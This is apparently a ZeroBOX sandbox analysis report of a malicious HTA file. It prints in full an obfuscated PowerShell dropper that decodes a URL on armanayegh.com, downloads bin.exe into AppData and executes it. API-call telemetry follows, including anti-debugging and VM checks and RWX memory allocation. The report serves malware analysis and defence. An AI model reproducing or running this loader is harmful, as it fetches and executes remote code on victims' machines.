Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 11, 2024, 10:11 a.m.	Nov. 11, 2024, 10:26 a.m.

Size	10.1KB
Type	HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5	`d588b40f7fbf15af9f1a4af0fc7a1cca`
SHA256	`eac0fc1901075a05e87655aac968b3b8595c771747340ad4cc79d4b0f3acdddb`
CRC32	`040876F9`
ssdeep	`96:E7WZCJFZgAQFG5NQFN5nMlsPcNb18c1c182HgY84cIfCND6JEzLH0oc1c1Ga55Eg:Gt148cW5rqkn`
Yara	None matched

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\glued.hta
2032
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function qpJjHLDo($uVcbIsX, $eaLSsHWCCXN){[IO.File]::WriteAllBytes($uVcbIsX, $eaLSsHWCCXN)};function DVBeAgXGLcA($uVcbIsX){if($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74780,74788,74788))) -eq $True){rundll32.exe $uVcbIsX }elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74792,74795,74729))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $uVcbIsX}elseif($uVcbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74789,74795,74785))) -eq $True){misexec /qn /i $uVcbIsX}else{Start-Process $uVcbIsX}};function KZTnGLuIim($PUvDBgveWwSt){$GeYZtqmLiNmKNhsptsUr = New-Object (EPzzBsdceWQKTROW @(74758,74781,74796,74726,74767,74781,74778,74747,74788,74785,74781,74790,74796));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$eaLSsHWCCXN = $GeYZtqmLiNmKNhsptsUr.DownloadData($PUvDBgveWwSt);return $eaLSsHWCCXN};function EPzzBsdceWQKTROW($ROcJgaV){$kPpvRDRSpOgSD=74680;$WXEChlqT=$Null;foreach($oFldbbbrBOt in $ROcJgaV){$WXEChlqT+=[char]($oFldbbbrBOt-$kPpvRDRSpOgSD)};return $WXEChlqT};function SVCwtRUGvOCbMZRV(){$uKZbujBvJ = $env:AppData + '\';$kzCLtclO = $uKZbujBvJ + 'bin.exe'; if (Test-Path -Path $kzCLtclO){DVBeAgXGLcA $kzCLtclO;}Else{ $cdRgfZr = KZTnGLuIim (EPzzBsdceWQKTROW @(74784,74796,74796,74792,74738,74727,74727,74777,74794,74789,74777,74790,74777,74801,74781,74783,74784,74726,74779,74791,74789,74727,74794,74781,74777,74780,74789,74781,74727,74778,74785,74790,74726,74781,74800,74781));qpJjHLDo $kzCLtclO $cdRgfZr;DVBeAgXGLcA $kzCLtclO;};;;;}SVCwtRUGvOCbMZRV;
  2168

Name	Response	Post-Analysis Lookup
armanayegh.com		185.94.96.102

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 11, 2024, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Nov. 11, 2024, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:11 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 11, 2024, 10:11 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 11, 2024, 10:11 a.m.			0	0

Command line console output was observed (50 out of 96 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net. console_handle: 0x00000023	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: lowing enumeration values and try again. The possible enumeration values are "S console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: sl3, Tls"." console_handle: 0x00000047	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: At line:1 char:703 console_handle: 0x00000053	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: + function qpJjHLDo($uVcbIsX, $eaLSsHWCCXN){[IO.File]::WriteAllBytes($uVcbIsX, console_handle: 0x0000005f	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: $eaLSsHWCCXN)};function DVBeAgXGLcA($uVcbIsX){if($uVcbIsX.EndsWith((EPzzBsdceWQ console_handle: 0x0000006b	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: KTROW @(74726,74780,74788,74788))) -eq $True){rundll32.exe $uVcbIsX }elseif($uV console_handle: 0x00000077	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: cbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74792,74795,74729))) -eq $True){powers console_handle: 0x00000083	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: hell.exe -ExecutionPolicy unrestricted -File $uVcbIsX}elseif($uVcbIsX.EndsWith( console_handle: 0x0000008f	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: (EPzzBsdceWQKTROW @(74726,74789,74795,74785))) -eq $True){misexec /qn /i $uVcbI console_handle: 0x0000009b	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: sX}else{Start-Process $uVcbIsX}};function KZTnGLuIim($PUvDBgveWwSt){$GeYZtqmLiN console_handle: 0x000000a7	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: mKNhsptsUr = New-Object (EPzzBsdceWQKTROW @(74758,74781,74796,74726,74767,74781 console_handle: 0x000000b3	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: ,74778,74747,74788,74785,74781,74790,74796));[Net.ServicePointManager]:: <<<< S console_handle: 0x000000bf	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: ecurityProtocol = [Net.SecurityProtocolType]::TLS12;$eaLSsHWCCXN = $GeYZtqmLiNm console_handle: 0x000000cb	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: KNhsptsUr.DownloadData($PUvDBgveWwSt);return $eaLSsHWCCXN};function EPzzBsdceWQ console_handle: 0x000000d7	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: KTROW($ROcJgaV){$kPpvRDRSpOgSD=74680;$WXEChlqT=$Null;foreach($oFldbbbrBOt in $R console_handle: 0x000000e3	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: OcJgaV){$WXEChlqT+=[char]($oFldbbbrBOt-$kPpvRDRSpOgSD)};return $WXEChlqT};funct console_handle: 0x000000ef	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: ion SVCwtRUGvOCbMZRV(){$uKZbujBvJ = $env:AppData + '\';$kzCLtclO = $uKZbujBvJ + console_handle: 0x000000fb	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: 'bin.exe'; if (Test-Path -Path $kzCLtclO){DVBeAgXGLcA $kzCLtclO;}Else{ $cdRgfZ console_handle: 0x00000107	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: r = KZTnGLuIim (EPzzBsdceWQKTROW @(74784,74796,74796,74792,74738,74727,74727,74 console_handle: 0x00000113	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: 1,74800,74781));qpJjHLDo $kzCLtclO $cdRgfZr;DVBeAgXGLcA $kzCLtclO;};;;;}SVCwtRU console_handle: 0x00000137	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: GvOCbMZRV; console_handle: 0x00000143	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000014f	1	1
WriteConsoleW Nov. 11, 2024, 10:11 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000015b	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The remote name could n console_handle: 0x0000017b	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: ot be resolved: 'armanayegh.com'" console_handle: 0x00000187	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: At line:1 char:805 console_handle: 0x00000193	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: + function qpJjHLDo($uVcbIsX, $eaLSsHWCCXN){[IO.File]::WriteAllBytes($uVcbIsX, console_handle: 0x0000019f	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: $eaLSsHWCCXN)};function DVBeAgXGLcA($uVcbIsX){if($uVcbIsX.EndsWith((EPzzBsdceWQ console_handle: 0x000001ab	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: KTROW @(74726,74780,74788,74788))) -eq $True){rundll32.exe $uVcbIsX }elseif($uV console_handle: 0x000001b7	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: cbIsX.EndsWith((EPzzBsdceWQKTROW @(74726,74792,74795,74729))) -eq $True){powers console_handle: 0x000001c3	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: hell.exe -ExecutionPolicy unrestricted -File $uVcbIsX}elseif($uVcbIsX.EndsWith( console_handle: 0x000001cf	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: (EPzzBsdceWQKTROW @(74726,74789,74795,74785))) -eq $True){misexec /qn /i $uVcbI console_handle: 0x000001db	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: sX}else{Start-Process $uVcbIsX}};function KZTnGLuIim($PUvDBgveWwSt){$GeYZtqmLiN console_handle: 0x000001e7	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: mKNhsptsUr = New-Object (EPzzBsdceWQKTROW @(74758,74781,74796,74726,74767,74781 console_handle: 0x000001f3	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: ,74778,74747,74788,74785,74781,74790,74796));[Net.ServicePointManager]::Securit console_handle: 0x000001ff	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: yProtocol = [Net.SecurityProtocolType]::TLS12;$eaLSsHWCCXN = $GeYZtqmLiNmKNhspt console_handle: 0x0000020b	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: sUr.DownloadData <<<< ($PUvDBgveWwSt);return $eaLSsHWCCXN};function EPzzBsdceWQ console_handle: 0x00000217	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: KTROW($ROcJgaV){$kPpvRDRSpOgSD=74680;$WXEChlqT=$Null;foreach($oFldbbbrBOt in $R console_handle: 0x00000223	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: OcJgaV){$WXEChlqT+=[char]($oFldbbbrBOt-$kPpvRDRSpOgSD)};return $WXEChlqT};funct console_handle: 0x0000022f	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: ion SVCwtRUGvOCbMZRV(){$uKZbujBvJ = $env:AppData + '\';$kzCLtclO = $uKZbujBvJ + console_handle: 0x0000023b	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: 'bin.exe'; if (Test-Path -Path $kzCLtclO){DVBeAgXGLcA $kzCLtclO;}Else{ $cdRgfZ console_handle: 0x00000247	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: r = KZTnGLuIim (EPzzBsdceWQKTROW @(74784,74796,74796,74792,74738,74727,74727,74 console_handle: 0x00000253	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: 1,74800,74781));qpJjHLDo $kzCLtclO $cdRgfZr;DVBeAgXGLcA $kzCLtclO;};;;;}SVCwtRU console_handle: 0x00000277	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: GvOCbMZRV; console_handle: 0x00000283	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000028f	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000029b	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: Exception calling "WriteAllBytes" with "2" argument(s): "Value cannot be null. console_handle: 0x0000001b	1	1
WriteConsoleW Nov. 11, 2024, 10:12 a.m.	buffer: Parameter name: bytes" console_handle: 0x00000027	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 53 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e5c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e59f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e59f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e59f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e59f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e59f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e59f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e6538 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e65b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e65b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e65b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e65b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e65b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e65b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e65b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:11 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e65b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e64b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e64b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e64b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 11, 2024, 10:12 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002e64b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 11, 2024, 10:11 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 165 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02710000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71aa2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0254c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:11 a.m.	process_identifier: 2168 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0255c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
